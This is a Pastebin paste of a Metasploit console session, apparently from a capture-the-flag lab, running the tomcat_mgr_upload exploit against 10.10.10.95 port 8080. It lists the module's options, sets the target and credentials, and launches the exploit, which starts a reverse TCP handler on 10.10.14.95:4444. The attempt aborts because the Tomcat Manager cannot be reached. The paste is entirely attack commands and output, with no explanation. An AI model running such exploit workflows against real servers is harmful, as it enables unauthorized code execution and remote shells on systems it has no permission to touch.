Advertisement
Guest User

Untitled

a guest
Jul 1st, 2018
102
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.64 KB | None | 0 0
  1. msf exploit(multi/http/tomcat_mgr_upload) > show options
  2. $
  3. Module options (exploit/multi/http/tomcat_mgr_upload):
  4.  
  5. Name Current Setting Required Description
  6. ---- --------------- -------- -----------
  7. HttpPassword no The password for the specified username
  8. HttpUsername no The username to authenticate as
  9. Proxies no A proxy chain of format type:host:port[,type:host:port][...]
  10. RHOST yes The target address
  11. RPORT 80 yes The target port (TCP)
  12. SSL false no Negotiate SSL/TLS for outgoing connections
  13. TARGETURI /manager yes The URI path of the manager app (/html/upload and /undeploy will be used)
  14. VHOST no HTTP server virtual host
  15.  
  16.  
  17. Exploit target:
  18.  
  19. Id Name
  20. -- ----
  21. 0 Java Universal
  22.  
  23.  
  24. msf exploit(multi/http/tomcat_mgr_upload) > set HttpPassword no
  25. HttpPassword => no
  26. msf exploit(multi/http/tomcat_mgr_upload) > set HttpUsername no
  27. HttpUsername => no
  28. msf exploit(multi/http/tomcat_mgr_upload) > set RHOST 10.10.10.95
  29. RHOST => 10.10.10.95
  30. msf exploit(multi/http/tomcat_mgr_upload) > set RPORT 8080
  31. RPORT => 8080
  32. msf exploit(multi/http/tomcat_mgr_upload) > set target 1
  33. target => 1
  34. msf exploit(multi/http/tomcat_mgr_upload) > exploit
  35.  
  36. [*] Started reverse TCP handler on 10.10.14.95:4444
  37. [*] Retrieving session ID and CSRF token...
  38. [-] Exploit aborted due to failure: unknown: Unable to access the Tomcat Manager
  39. [*] Exploit completed, but no session was created.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement